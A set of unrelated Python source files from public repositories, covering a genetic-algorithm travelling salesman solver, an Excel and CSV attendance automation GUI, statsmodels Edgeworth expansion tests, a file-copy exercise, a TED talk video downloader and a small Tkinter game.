191673548c9145be7cdb0f59715a306f851e480b | Python | The-Victoria-Initiative/copernicium | /code/03/solveTSProblem.py | UTF-8 | 5,833 | 3 | 3 | [] | no_license | ###################
print "run : --- Solving a travelling salesman problem with a genetic algorithm"
###################
from optparse import OptionParser
parser = OptionParser()
parser.add_option("-W", "--width", help="width", action="store", type=int, dest="width", default=400)
parser.add_option("-H", "--height", help="height", action="store", type=int, dest="height", default=400)
parser.add_option("-p", "--points", help="points", action="store", type=int, dest="points", default=20)
parser.add_option("-g", "--genotypes", help="the number of genotypes", action="store", type=int, dest="genotypes", default=10)
parser.add_option("-i", "--iteration_limit", help="limit the number of generations", action="store", type=int, dest="max_generations", default=1000)
parser.add_option("-m", "--mutation_chance", help="the mutation probability", action="store", type=float, dest="mutation_chance", default=0.1)
parser.add_option("-a", "--always_best", help="the fittest always survive", action="store_true", dest="always_best", default=False)
parser.add_option("-v", "--verbose", help="turn on verbose mode", action="store_true", dest="verbose", default=False)
(options, args) = parser.parse_args()
if options.verbose:
print "run : --- Options"
print "run : width: ",options.width
print "run : height: ",options.height
print "run : points: ",options.points
print "run : n genotypes: ",options.genotypes
print "run : maximum generations: ",options.max_generations
print "run : mutation probability: ",options.mutation_chance
print "run : fittest always survives: ",options.always_best
print "run : verbose: ",options.verbose
###################
import Population
import FitnessMeasures
import Tools
import Point
# from math import sqrt
import time
###################
print "run : --- Make points"
points = Tools.FillBoard(options.width,options.height,options.points)
print "run : ",points
fitness = FitnessMeasures.TSFitnessMeasure(points)
bases = Tools.MinBases(options.points)
print "run : points: %i, bases: %i (2^%i = %i)"%(options.points,bases,bases,2**bases)
population = \
Population.Population(fitness,
n_genotypes=options.genotypes,
n_genes=options.points*2,
n_bases=bases,
mutation_chance=options.mutation_chance,
always_best=options.always_best,
verbose=options.verbose)
generation = 0
evolution = []
###################
print "run : --- Running"
ga_start = time.time()
while(True):
generation +=1
if (options.max_generations != -1) and (generation > options.max_generations): break
if options.verbose or (generation%100 == 0):
print "run : generation[%i]"%generation
best_result = max(population.fitness)
print "run : best result: %f"%best_result
print population
if options.verbose: print "run : selecting fittest"
fittest = population.select_fittest()
evolution.append((fittest[0],
(1. / (max(population.fitness))),
fitness.eval((fittest[0].eval()),return_coding=True)))
# if (best_result > threshold): break
if options.verbose: print "run : breeding: %s and %s"%(fittest[0].name,fittest[1].name)
population.breed_next_generation(fittest)
population.eval()
ga_end = time.time()
print population
best_result = max(population.fitness)
fittest = population.select_fittest()
best_path = fitness.eval((fittest[0].eval()))[1]
coding_used = fitness.eval((fittest[0].eval()),return_coding=True)
print "run : final generation[%i], best result: %f"%(generation, 1. / best_result)
print "run : solution: %s"%repr(fittest[0])
print "run : ",coding_used
print "run : ",best_path
print "run : time taken: %.2f s"%(ga_end-ga_start)
# ###################
# print "run : --- Brute force problem solving"
# brute_start = time.time()
# best_circle = Tools.SolveBoard(board,path,verbose=False)
# brute_end = time.time()
# print "run : solution: %s"%repr(best_circle)
# print "run : time taken: %.2f s"%(brute_end-brute_start)
###################
print "test : --- Write points to file"
file_name = "board_setup.csv"
Tools.WritePointsToCSV(points,file_name)
print "run : --- Write path to file"
file_name = "path.csv"
Tools.WritePathToFile(best_path,points,file_name)
print "run : --- Write scores to file"
file_name = "evolution.json"
Tools.WriteEvolutionToJSON(evolution,points,fitness,file_name)
print "run : --- Write genotype to file"
file_name = "genotype.json"
Tools.WriteGenotypeToJSON(fittest[0],file_name,coding=coding_used)
# print "run : --- Write evolution of path to file"
# file_name = "evolution.csv"
# Tools.WriteCirclesToCSV(best_path,file_name,scores=scores)
# print "run : --- Write parameters to file"
# file_name = "parameters.csv"
# Tools.WriteParametersToFile(options,file_name)
# print "run : --- Write results to files"
# results = {
# "GA result":repr(fittest[0].eval())[:-4],
# "GA time" :"%.2f s"%(ga_end-ga_start),
# "GA score" :"%.2f"%sqrt(best_result),
# "Brute force circle":repr(best_circle)[:-4],
# "Brute force Time" :"%.2f s"%(brute_end-brute_start),
# "Brute force score" :"%.2f"%best_circle.r
# }
# file_name = "results.json"
# import json
# with open(file_name, 'wb') as fp: json.dump(results, fp)
###################
print "run : --- done\n" | true |
80bb9638dc982e25fe757c1359487a3161eee9ce | Python | jaytparekh7121994/PythonProjects | /FinalApplicationwithGui.py | UTF-8 | 12,309 | 3.1875 | 3 | [] | no_license | """ This is the final version of Excel Task allocated.
This is a GUI-based Python program which takes one CSV file and two XLSX files as input.
Instructions:
1) The data.csv file has to be renamed in mmyyyy.csv format
Eg; data.csv file for Month of November would be 112019.csv it will create an output112019.csv for reference
2) Name and Employee ID in .csv must match in Team Details sheet of Utilization_file.xlsx must be updated
Do not press "start" untill you have not given the input to all the 3 files alongwith the sheetname of 3rd file
"""
# Adding all the modules that are necessary for this program
import csv
import datetime
import calendar
from tkinter import filedialog
from tkinter import *
import ntpath
import openpyxl
import sys
import os
""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
def automation_logic():
    """Process the attendance CSV and produce the weekly-leave reference file.

    Reads the mmyyyy.csv export whose path is in the global ``input_data``
    (set by the Browse button): the month/year are parsed from the file name,
    per-employee leave is accumulated week by week, and the result is written
    to ``output<month><year>.csv``.  The sections that follow push these
    results into the two Excel workbooks and notify the user.
    """
    # File name encodes the period: first two chars = month, rest = year
    # (e.g. "112019.csv" -> November 2019), as described in the module docstring.
    basename=ntpath.basename(input_data)
    #print (filePath)
    splitName=basename.split(".")
    filename=splitName[0]
    month=int(filename[0:2])
    #print(month)
    year=int(filename[2:])
    #print(year)
    ##From here the Data.csv file is read and leave of each employee is been calculated
    # csv file name
    # initializing the titles and rows list
    # NOTE(review): `fields` and `offdayList` are assigned but never used below.
    fields = []
    rows = []
    List1=[]
    tempList=[]
    titles=['Emp Id','Name']
    offdayList=['WO','HL']
    # Attendance codes counted as a full day of leave; 'L/2' counts as half.
    leaveList=['LW','LV','AL','A','AB','CO']
    ##CompOff and TRavelling are not been considered here
    day=1
    m_range=calendar.monthrange(year,month)
    date=datetime.date(year,month,day)
    #dayNumber of 1st day of month
    # monthrange()[0] is 0 for Monday; +1 shifts it so 7 (Sunday) wraps to 0.
    firstDay=m_range[0]+1#1 ->Monday
    if firstDay == 7:
        firstDay=0
    print(firstDay)
    # ISO week numbers of the first and last day give the column headers.
    startWeek=date.isocalendar()[1]
    day=m_range[1]
    date=datetime.date(year,month,day)
    endWeek=date.isocalendar()[1]
    for i in range(startWeek,endWeek+1):
        temp='Week '+str(i)
        titles.append(temp)
    #print(titles)
    List1.append(titles)
    # reading csv file
    with open(input_data, 'r') as csvfile:
        # creating a csv reader object
        csvreader = csv.reader(csvfile)
        # extracting field names through first row
        fields = next(csvreader)
        # extracting each data row one by one
        for row in csvreader:
            rows.append(row)
    ###### Creating outputmmyyyy.csv reference File
    # Walk each employee row: columns 0-1 are id/name, columns 4+ are one
    # attendance code per calendar day.  `dayCounter` tracks the weekday so a
    # per-week leave subtotal is emitted every time a week (Sunday) closes,
    # plus a final partial-week subtotal at month end.
    dayCounter=firstDay
    leave=0
    endday=0
    for row in rows:
        # parsing each column of a row
        for col in row[:2]:
            tempList.append(col)
            #print("%10s"%col ,end='')
        #Leave Comparison Logic
        for col in row[4:]:
            endday+=1
            if(dayCounter<7):
                if col in leaveList:
                    leave+=1.0
                elif col == 'L/2':
                    leave+=0.5
                dayCounter+=1
            if(dayCounter==7):
                dayCounter=0
                tempList.append(int(leave))
                leave=0
            if(endday==day):
                tempList.append(int(leave))
                endday=0
                dayCounter=firstDay
                leave=0
        #print(dayCounter)
        #print(leave)
        #print(tempList)
        List1.append(tempList)
        tempList=[]
        #print('\n')
    ##Printing the List1 having Empid,Name and Leave details
    print(List1)
    ##This outfile is having the weekwise leave plan data
    outputfile='output'+str(month)+str(year)+'.csv'
    with open(outputfile,'w',newline='') as writeFile:
        writer=csv.writer(writeFile)
        writer.writerows(List1)
    # NOTE(review): both files were already closed by their `with` blocks;
    # these explicit close() calls are redundant (harmless no-ops).
    csvfile.close()
    writeFile.close()
""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
    #Writing to Team Utilization
    # Copy the per-week leave figures from output<mm><yyyy>.csv into the
    # "Utilization" sheet of the Team Utilization workbook.  Employee IDs come
    # from column 4 of "Team Details" (rows 4..max); each employee's week
    # values land on row i+7 starting at column 17 (Q), stepping 8 columns
    # per week.
    wb=openpyxl.load_workbook(team_utilization)
    sheet=wb["Team Details"]
    emp_id=[]
    m_row=sheet.max_row
    for i in range(4,m_row+1):
        cell_obj=sheet.cell(row=i,column=4)
        cell_obj=sheet.cell(row=i,column=4) if False else cell_obj  # no-op; see NOTE below
        emp_id.append(cell_obj.value)
    print(emp_id)
    f=open(outputfile,"r")
    csv_file=csv.reader(f,delimiter=",")
    personData=[]
    sheet1=wb["Utilization"]
    startNum=17 #Q7 ..Week 1 of month
    for row in csv_file:
        for i in range(0,len(emp_id)):
            if str(emp_id[i]) in row[0]:
                personData=row
            # NOTE(review): this inner loop is NOT inside the `if` above, so
            # it re-writes `personData` (possibly from an earlier row) for
            # every employee index -- looks unintended; confirm.
            for j in range(2,len(personData)):
                cell=sheet1.cell(row=i+7,column=startNum)
                cell.value=personData[j]
                startNum+=8
            startNum=17
    wb.save(team_utilization)
    f.close()
    #os.remove('output.csv')
""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
    # Leave_projection
    # Read the month sheet (global `month_name`) of the Leave Plan workbook
    # and fill the "Data Input" sheet of the Team Utilization workbook:
    # "L" -> 0 with a red fill, "HL"/"wo" -> " ", anything else -> 8.5 hours.
    sheet=wb["Team Details"]
    emp_id=[]
    m_row=sheet.max_row
    for i in range(4,m_row+1):
        cell_obj=sheet.cell(i,4)
        emp_id.append(cell_obj.value)
    print(emp_id)
    wb1=openpyxl.load_workbook(leave_projection)
    sheet1=wb1[month_name]
    ##sheet1=wb1.sheetnames
    ##print(sheet1)
    m_row1=sheet1.max_row - 4
    # Codes that do NOT count as a full working day.
    dontCare=["L","wo","HL"]
    # Day columns in "Data Input" start at column 13 (M).
    input_counter=13
    data_input=wb["Data Input"]
    for i in range(6,m_row1):
        empid=sheet1.cell(i,4).value
        if empid in emp_id:
            #print(empid)
            #print(emp_id.index(empid))
            for j in range(6,day+6): #Day is last day of month
                value1=sheet1.cell(i,j).value
                if value1 in dontCare:
                    if value1=="L":
                        # Full leave day: mark 0 with a red background.
                        redfill=openpyxl.styles.fills.PatternFill(fill_type="solid",fgColor='00ff0000')
                        cell=data_input.cell(emp_id.index(empid)+7,input_counter)
                        cell.value=0
                        cell.fill=redfill
                        #font =openpyxl.styles.Font(name='Calibri',bold=False,size=11,color='00FFFF00')
                        #cell.font=font
                    if value1=="HL":
                        #redfill=openpyxl.styles.PatternFill(fill_type="solid",fgColor='00383635')
                        cell=data_input.cell(emp_id.index(empid)+7,input_counter)
                        cell.value=" "
                        #cell.fill=redfill
                        #font =openpyxl.styles.Font(name='Calibri',bold=True,size=11,color='00FFFF00')
                        #cell.font=font
                    if value1=="wo":
                        cell=data_input.cell(emp_id.index(empid)+7,input_counter)
                        cell.value=" "
                        #font =openpyxl.styles.Font(name='Calibri',bold=False,size=11,color='00000000')
                        #cell.font=font
                    input_counter+=1
                else:
                    # Regular working day: standard 8.5 hours.
                    cell=data_input.cell(emp_id.index(empid)+7,input_counter)
                    cell.value=8.5
                    input_counter+=1
            input_counter=13
    wb.save(team_utilization)
    # Tell the user we are done, auto-close the window after 20 s and open
    # the three processed files with their default applications (Windows-only:
    # os.startfile exists only on Windows).
    message = Message(datafield, text="Task Completed Now You Can Close the Window", relief=RIDGE,aspect=1000,anchor=W,bg="#fff",justify=CENTER )
    message.grid(row=5,column=1)
    #destroy after 20 seconds
    datafield.after(20000,lambda: datafield.destroy())
    os.startfile(input_data)
    os.startfile(team_utilization)
    os.startfile(leave_projection)
""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
#Tkinter GUI Code Starts
# Two Tk instances are created: `root` is hidden (withdraw) and only serves as
# the parent for the file dialogs / holder of root.filename, while `datafield`
# is the visible application window.
root = Tk()
root.withdraw()
datafield=Tk()
datafield.title("Team Management System")
# File dialogs start in the directory the program was launched from.
currentDir=os.getcwd()
#Path of excel files
##input_data=''
##team_utilization=''
##leave_projection=''
##month_name=''
##def printing_data():
##    print(input_data)
##    print(team_utilization)
##    print(leave_projection)
##    print(month_name)
## CSV file is Employee's monthly attendance data mmyyyy.csv
def filenamecsv(arg=None):
    """Prompt for the MyWorld attendance .csv file, remember its path in the
    global ``input_data`` and display its base name in the first row."""
    global input_data
    chosen = filedialog.askopenfilename(
        initialdir=currentDir,
        title="Select MyWorld csv File",
        filetypes=(("CSV files", "*.csv"), ("all files", "*.*")),
    )
    root.filename = chosen
    input_data = chosen
    base_name = ntpath.basename(chosen)
    print(base_name)
    name_label = Label(datafield, text=base_name, anchor=W, bg="#fff",
                       justify=LEFT, width=50, relief=RIDGE, padx=2)
    name_label.grid(row=0, column=1)
    name_label.config(text=base_name)
## Utilization_file.xlsx where the output is been fed is in this Excel Workbook. End Sheet affected are "Utilization field"
def filenamexlsx(arg=None):
    """Prompt for the Team Utilization workbook, remember its path in the
    global ``team_utilization`` and display its base name in row 1."""
    global team_utilization
    chosen = filedialog.askopenfilename(
        initialdir=currentDir,
        title="Select Team Utilization Excel File",
        filetypes=(("Excel files", "*.xlsx"), ("all files", "*.*")),
    )
    root.filename = chosen
    team_utilization = chosen
    base_name = ntpath.basename(chosen)
    print(base_name)
    name_label = Label(datafield, text=base_name, anchor=W, bg="#fff",
                       justify=LEFT, width=50, relief=RIDGE, padx=2)
    name_label.grid(row=1, column=1)
def callback(selection):
    """OptionMenu handler: store the chosen sheet name in the global
    ``month_name`` and echo it in the row-3 label."""
    global month_name
    month_name = selection
    chosen_label = Label(datafield, text=selection, anchor=W, bg="#fff",
                         justify=LEFT, width=50, relief=RIDGE, padx=2)
    chosen_label.grid(row=3, column=1)
def filenamexlsx1(arg=None):
    """Prompt for the Leave Plan workbook, remember its path in the global
    ``leave_projection``, display its base name, and populate the month
    OptionMenu with the workbook's sheet names."""
    global leave_projection
    chosen = filedialog.askopenfilename(
        initialdir=currentDir,
        title="Select Leave Plan Excel File",
        filetypes=(("Excel File", "*.xlsx"), ("all files", "*.*")),
    )
    root.filename = chosen
    leave_projection = chosen
    base_name = ntpath.basename(chosen)
    print(base_name)
    name_label = Label(datafield, text=base_name, anchor=W, bg="#fff",
                       justify=LEFT, width=50, relief=RIDGE, padx=2)
    name_label.grid(row=2, column=1)
    # Build the sheet-name selector from the workbook itself; `callback`
    # records the user's choice in the global month_name.
    workbook = openpyxl.load_workbook(chosen)
    sheet_names = workbook.sheetnames
    selected = StringVar(datafield)
    selected.set("Select Month")
    menu = OptionMenu(datafield, selected, *sheet_names, command=callback)
    menu.grid(row=3, column=2)
#myEntry=Entry(datafield,width=20)
##myEntry.focus()
##myEntry.bind("<Return>",returnEntry)
##myEntry.grid(row=0,column=1)
##
##enterEntry=Button(datafield,text="Enter",command=returnEntry)
##enterEntry.grid(row=0,column=4)
####### Left side Labels #############
# Column 0: static captions for the three file pickers and the sheet selector.
L1 = Label(datafield, text = "MyWorld Data.csv")
L1.grid(row=0,column=0)
#L1.pack(side = LEFT)
L2 = Label(datafield, text = "Temp Utilization.xlsx")
L2.grid(row=1,column=0)
L3 =Label(datafield, text = "Leave Plan.xlsx")
L3.grid(row=2,column=0)
L4 =Label(datafield, text = "Select Sheet Name")
L4.grid(row=3,column=0)
####### Buttons #######
# Column 2: Browse buttons wired to the pickers above; "Start" runs the job.
B1 = Button(datafield, text="Browse", command=filenamecsv)
B1.grid(row=0,column=2)
B2 = Button(datafield, text="Browse", command=filenamexlsx)
B2.grid(row=1,column=2)
B3 = Button(datafield, text="Browse", command=filenamexlsx1)
B3.grid(row=2,column=2)
# NOTE(review): B3 is rebound here, shadowing the third Browse button's
# variable.  The widget itself survives (grid() was already called), but the
# name no longer refers to it -- a distinct name (e.g. B4) would be clearer.
B3 = Button(datafield, text="Start", command=automation_logic)
B3.grid(row=4,column=1)
# Column 1: empty placeholder labels that the pickers overwrite with the
# chosen file names.
lbpath=Label(datafield,text=" ",anchor=W,bg="#fff",justify=LEFT,width=50,relief=RIDGE,padx=2)
lbpath.grid(row=0,column=1)
lbpath1=Label(datafield,text=" ",anchor=W,bg="#fff",justify=LEFT,width=50,relief=RIDGE,padx=2)
lbpath1.grid(row=1,column=1)
lbpath2=Label(datafield,text=" ",anchor=W,bg="#fff",justify=LEFT,width=50,relief=RIDGE,padx=2)
lbpath2.grid(row=2,column=1)
# NOTE(review): two Tk instances each get a mainloop(); datafield.mainloop()
# only starts after root's loop exits.  A single Tk root would be simpler.
root.mainloop()
datafield.mainloop()
##looper=1
##while looper:
## if month_name!='':
## looper=0
#print("Outside Loop")
#######
| true |
af0a7de1dffa00128d4e088ba82c721de62708be | Python | Nazawrius/Lab5 | /Info.py | UTF-8 | 1,389 | 3.25 | 3 | [] | no_license | from containers import Student, Date, Try
class Info:
    """Aggregates attempt records from an iterable of CSV rows.

    Column 7 of each row is the problem description; rows sharing a
    description are grouped under one Problem instance via add_try.
    """
    def __init__(self, Csv):
        self._problems = {}
        self._entries = 0
        for record in Csv:
            self._entries += 1
            key = record[7]
            if key not in self._problems:
                self._problems[key] = Problem(key)
            self._problems[key].add_try(record)
    @property
    def entries(self):
        """Total number of rows processed."""
        return self._entries
    @property
    def problems(self):
        """Mapping of description -> Problem."""
        return self._problems
class Problem:
    """A problem description together with every recorded attempt at it."""

    # Characters permitted in a description (same set as the original
    # validation string); frozenset gives O(1) membership per character.
    _ALLOWED_CHARS = frozenset(
        'abcdefghijklmnopqrstuvwxyz'
        'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
        '0123456789'
        '" -.,_{}$+*\\()%[]'
    )

    def __init__(self, description):
        """Validate and store the description.

        Raises ValueError (a subclass of the bare Exception raised before)
        when the description is shorter than 4 or longer than 68 characters,
        contains a disallowed character, or has leading/trailing whitespace.
        """
        if not (4 <= len(description) <= 68
                and all(ch in self._ALLOWED_CHARS for ch in description)
                and description.strip() == description):
            raise ValueError("invalid problem description: %r" % (description,))
        self._description = description
        self._tries = []

    def add_try(self, row):
        """Append one attempt built from a raw CSV row.

        Row layout (by index): 5/4/0 -> Student, 1/3/6 -> Date, 2 -> percent.
        """
        date = Date(row[1], row[3], row[6])
        name = Student(row[5], row[4], row[0])
        percent = row[2]
        self._tries.append(Try(name, date, self._description, percent))

    @property
    def description(self):
        """The validated description string."""
        return self._description

    @property
    def tries(self):
        """List of recorded Try objects, in insertion order."""
        return self._tries
| true |
329eb8efe793b0ff7b05cd66b5cff7ff897983cd | Python | statsmodels/statsmodels | /statsmodels/distributions/tests/test_edgeworth.py | UTF-8 | 6,416 | 2.703125 | 3 | [
"BSD-3-Clause"
] | permissive |
import warnings
import numpy as np
from numpy.testing import (assert_equal, assert_raises,
assert_allclose)
import numpy.testing as npt
from scipy.special import gamma, factorial, factorial2
import scipy.stats as stats
from statsmodels.distributions.edgeworth import (_faa_di_bruno_partitions,
cumulant_from_moments, ExpandedNormal)
class TestFaaDiBruno:
    """Checks for the Faa di Bruno partition generator."""

    def test_neg_arg(self):
        # Non-positive orders must be rejected.
        for bad_order in (-1, 0):
            assert_raises(ValueError, _faa_di_bruno_partitions, bad_order)

    def test_small_vals(self):
        # Every partition ks = [(m, k), ...] of order n satisfies sum(m*k) == n.
        for n in range(1, 5):
            for ks in _faa_di_bruno_partitions(n):
                assert_equal(sum(m * k for (m, k) in ks), n)
def _norm_moment(n):
# moments of N(0, 1)
return (1 - n % 2) * factorial2(n - 1)
def _norm_cumulant(n):
# cumulants of N(0, 1)
try:
return {1: 0, 2: 1}[n]
except KeyError:
return 0
def _chi2_moment(n, df):
# (raw) moments of \chi^2(df)
return (2**n) * gamma(n + df/2.) / gamma(df/2.)
def _chi2_cumulant(n, df):
assert n > 0
return 2**(n-1) * factorial(n - 1) * df
class TestCumulants:
    """Tests for cumulant_from_moments against known distributions."""

    def test_badvalues(self):
        # The requested order must lie in 1..len(moments).
        for order in (0, 4):
            assert_raises(ValueError, cumulant_from_moments, [1, 2, 3], order)

    def test_norm(self):
        # The first four raw moments of N(0, 1) must reproduce its cumulants.
        n_moments = 4
        momt = [_norm_moment(j) for j in range(1, n_moments + 1)]
        for order in range(1, n_moments + 1):
            assert_allclose(cumulant_from_moments(momt, order),
                            _norm_cumulant(order), atol=1e-12)

    def test_chi2(self):
        # Same round-trip check for chi-square with 8 degrees of freedom.
        n_moments, df = 4, 8
        momt = [_chi2_moment(j, df) for j in range(1, n_moments + 1)]
        for order in range(1, n_moments + 1):
            assert_allclose(cumulant_from_moments(momt, order),
                            _chi2_cumulant(order, df))
class TestExpandedNormal:
    """Tests for the Edgeworth expansion around the normal (ExpandedNormal)."""

    def test_too_few_cumulants(self):
        # At least two cumulants are required.
        assert_raises(ValueError, ExpandedNormal, [1])
    def test_coefficients(self):
        # Check the private polynomial coefficients for increasing expansion
        # orders; RuntimeWarnings about negative pdf values are irrelevant here.
        with warnings.catch_warnings():
            warnings.simplefilter('ignore', RuntimeWarning)
            # 3rd order in n**(1/2)
            ne3 = ExpandedNormal([0., 1., 1.])
            assert_allclose(ne3._coef, [1., 0., 0., 1./6])
            # 4th order in n**(1/2)
            ne4 = ExpandedNormal([0., 1., 1., 1.])
            assert_allclose(ne4._coef, [1., 0., 0., 1./6, 1./24, 0., 1./72])
            # 5th order
            ne5 = ExpandedNormal([0., 1., 1., 1., 1.])
            assert_allclose(ne5._coef, [1., 0., 0., 1./6, 1./24, 1./120,
                                        1./72, 1./144, 0., 1./1296])
            # adding trailing zeroes increases the order
            ne33 = ExpandedNormal([0., 1., 1., 0.])
            assert_allclose(ne33._coef, [1., 0., 0., 1./6, 0., 0., 1./72])
    def test_normal(self):
        # with two cumulants, it's just a gaussian
        ne2 = ExpandedNormal([3, 4])
        x = np.linspace(-2., 2., 100)
        assert_allclose(ne2.pdf(x), stats.norm.pdf(x, loc=3, scale=2))
    def test_chi2_moments(self):
        # construct the expansion for \chi^2
        N, df = 6, 15
        cum = [_chi2_cumulant(n+1, df) for n in range(N)]
        with warnings.catch_warnings():
            warnings.simplefilter("ignore", RuntimeWarning)
            ne = ExpandedNormal(cum, name='edgw_chi2')
        # compare the moments
        assert_allclose([_chi2_moment(n, df) for n in range(N)],
                        [ne.moment(n) for n in range(N)])
        # compare the pdf [fragile!]
        # this one is actually not a very good test: there is, strictly
        # speaking, no guarantee that the pdfs match point-by-point
        # m, s = df, np.sqrt(df)
        # x = np.linspace(m - s, m + s, 10)
        # assert_allclose(ne.pdf(x), stats.chi2.pdf(x, df),
        #                 atol=1e-4, rtol=1e-5)
        # pdf-cdf roundtrip
        check_pdf(ne, arg=(), msg='')
        # cdf-ppf roundtrip
        check_cdf_ppf(ne, arg=(), msg='')
        # cdf + sf == 1
        check_cdf_sf(ne, arg=(), msg='')
        # generate rvs & run a KS test
        np.random.seed(765456)
        rvs = ne.rvs(size=500)
        check_distribution_rvs(ne, args=(), alpha=0.01, rvs=rvs)
    def test_pdf_no_roots(self):
        # With warnings escalated to errors, constructing these expansions
        # must NOT warn: the pdf polynomial has no real roots.
        with warnings.catch_warnings():
            warnings.simplefilter("error", RuntimeWarning)
            ne = ExpandedNormal([0, 1])
            ne = ExpandedNormal([0, 1, 0.1, 0.1])
    def test_pdf_has_roots(self):
        # Conversely, these cumulants yield a pdf with real roots (negative
        # density somewhere), which must raise the escalated RuntimeWarning.
        with warnings.catch_warnings():
            warnings.simplefilter("error", RuntimeWarning)
            assert_raises(RuntimeWarning, ExpandedNormal, [0, 1, 101])
## stolen verbatim from scipy/stats/tests/test_continuous_extra.py
# Decimal precision used by the assert_almost_equal checks below.
DECIMAL = 8
def check_pdf(distfn, arg, msg):
    """Compare pdf at (near) the median with a central difference of the cdf."""
    x0 = distfn.ppf(0.5, *arg)
    eps = 1e-6
    pdfv = distfn.pdf(x0, *arg)
    # Shift away from the median when the density there is tiny or huge:
    # near-zero density or a singularity makes the comparison meaningless.
    if pdfv < 1e-4 or pdfv > 1e4:
        x0 = x0 + 0.1
        pdfv = distfn.pdf(x0, *arg)
    cdf_slope = (distfn.cdf(x0 + eps, *arg) -
                 distfn.cdf(x0 - eps, *arg))/eps/2.0
    # replace with better diff and better test (more points),
    # actually, this works pretty well
    npt.assert_almost_equal(pdfv, cdf_slope,
           decimal=DECIMAL, err_msg=msg + ' - cdf-pdf relationship')
def check_cdf_ppf(distfn, arg, msg):
    """Verify that cdf(ppf(q)) == q at a few probability levels."""
    probs = [0.001, 0.5, 0.999]
    roundtrip = distfn.cdf(distfn.ppf(probs, *arg), *arg)
    npt.assert_almost_equal(roundtrip, probs, decimal=DECIMAL,
                            err_msg=msg + ' - cdf-ppf roundtrip')
def check_cdf_sf(distfn, arg, msg):
    """Verify that cdf(x) and the survival function sf(x) are complementary."""
    xs = [0.001, 0.5, 0.999]
    npt.assert_almost_equal(distfn.cdf(xs, *arg),
                            1. - distfn.sf(xs, *arg),
                            decimal=DECIMAL, err_msg=msg +' - sf+cdf == 1')
def check_distribution_rvs(distfn, args, alpha, rvs):
    """Kolmogorov-Smirnov check that the sample `rvs` follows `distfn`.

    The provided sample is tested first (signature avoids naming the
    distribution, unlike the scipy.stats.tests original); on a rare failure a
    fresh sample is drawn from `distfn` before asserting, reducing false alarms.
    """
    statistic, pval = stats.kstest(rvs, distfn.cdf, args=args, N=1000)
    if pval < alpha:
        statistic, pval = stats.kstest(distfn.rvs, distfn.cdf, args=args, N=1000)
        npt.assert_(pval > alpha, "D = " + str(statistic) + "; pval = " + str(pval) +
                    "; alpha = " + str(alpha) + "\nargs = " + str(args))
| true |
8de4847f8cb9f11ec8053cdfd02dbde0690c8497 | Python | cdesisto/lpthw | /Exercise17/ex17_drills2.py | UTF-8 | 1,536 | 3.78125 | 4 | [] | no_license | # Copied from ex17_drills.py to make this as short as possile
# Copied from ex17_drills.py: copy one file to another in as few lines as
# practical.  Usage: python ex17_drills2.py <from_file> <to_file>
from sys import argv
from os.path import exists  # kept for the (commented-out) exists() check

# argv unpacks into: this script's name, the source path, the destination path.
script, from_file, to_file = argv

# Read the whole source file.  The 'with' block closes the handle even on
# error -- the original one-liner `open(from_file).read()` leaked it.
with open(from_file) as in_file:
    indata = in_file.read()

# Write the copy.  The original `out_file = open(to_file, 'w').write(indata)`
# both leaked the handle and bound out_file to write()'s return value (the
# character count), not the file object, so out_file.close() could never work.
with open(to_file, 'w') as out_file:
    out_file.write(indata)
| true |
2a757b99415fe55c5157919859480460463f7f15 | Python | denisdickson/python_automation_tutorial_freecamporg | /tedtalks_downloader.py | UTF-8 | 1,121 | 2.765625 | 3 | [] | no_license | #!Python3
# Fetch the content of the TED talk page (third-party dependency: requests).
import requests
# Web scraping (third-party dependency: beautifulsoup4, lxml parser).
from bs4 import BeautifulSoup
# Regular-expression pattern matching.
import re
# from urllib.request import urlretrieve #downloading mp4
# for argument parsing
import sys
# The TED talk URL must be supplied as the first command-line argument.
if len(sys.argv) > 1:
    url = sys.argv[1]
else:
    sys.exit("Error: Please enter the TED Talk URL")
#
#
# sends get requests to get content of url and store in object r
r = requests.get(url)
print("Download's about to start")
soup = BeautifulSoup(r.content, features="lxml")
# Look for the <script> tag carrying the talk's metadata (talkPage.init) and
# keep its text.  NOTE(review): if no tag matches, `result` stays unbound and
# the re.search below raises NameError; also the unescaped '.' in
# "talkPage.init" matches any character -- presumably harmless here, confirm.
for val in soup.findAll("script"):
    if(re.search("talkPage.init", str(val))) is not None:
        result = str(val)
# Extract the first URL ending in "mp4" from the matched script text.
result_mp4 = re.search("(?P<url>https?://[^\s]+)(mp4)", result).group("url")
mp4_url = result_mp4.split('"')[0]
print("Downloading videom from "+mp4_url)
# Local file name = last path component of the URL, query string stripped.
file_name = mp4_url.split("/")[len(mp4_url.split("/"))-1].split('?')[0]
print("Storing video in ... "+file_name)
# Download the video and write it to disk in binary mode.
# NOTE(review): requests.get here loads the whole video into memory; for
# large files a streamed download (stream=True, iter_content) would be safer.
r = requests.get(mp4_url)
with open(file_name, 'wb') as f:
    f.write(r.content)
# alternate method
#urlretrieve(mp4, url, file_name)
print("Download process finished")
| true |
c277aeb945bb85e03da2236bdd54fc0dccf874de | Python | Pasachhe/beambalance | /balance.py | UTF-8 | 812 | 3.1875 | 3 | [] | no_license | from tkinter import *
from beam import *
class Game:
    """Tkinter window hosting the beam-balance game (beam from beam.py)."""
    def __init__(self, gameWidth, gameHeight):
        # Build the window and canvas, create the beam centred in the canvas,
        # wire the arrow keys to beam.rotate, and enter the Tk event loop.
        # NOTE: mainloop() blocks, so __init__ does not return until the
        # window is closed.
        self.root = Tk()
        self.gameWidth = gameWidth
        self.gameHeight = gameHeight
        self.gameWindow()
        self.beam = beam(self.canvas, x=self.gameWidth / 2,y=self.gameHeight / 2, width=50, height=50, turnspeed=10)
        self.root.bind('<Left>', self.beam.rotate)
        self.root.bind('<Right>', self.beam.rotate)
        self.root.mainloop()
    def gameWindow(self):
        # Create the frame and the purple canvas the beam is drawn on;
        # the canvas is stored on self for use by __init__.
        self.frame = Frame(self.root)
        self.frame.pack(fill=BOTH, expand=YES)
        self.canvas = Canvas(self.frame,width=self.gameWidth, height=self.gameHeight, bg="purple", takefocus=1)
        self.canvas.pack(fill=BOTH, expand=YES)
# Launch the game in a 600x600 window (blocks until the window is closed).
# NOTE(review): the name "asteroids" looks copied from another project --
# this object is the beam-balance Game.
asteroids = Game(600,600)
| true |
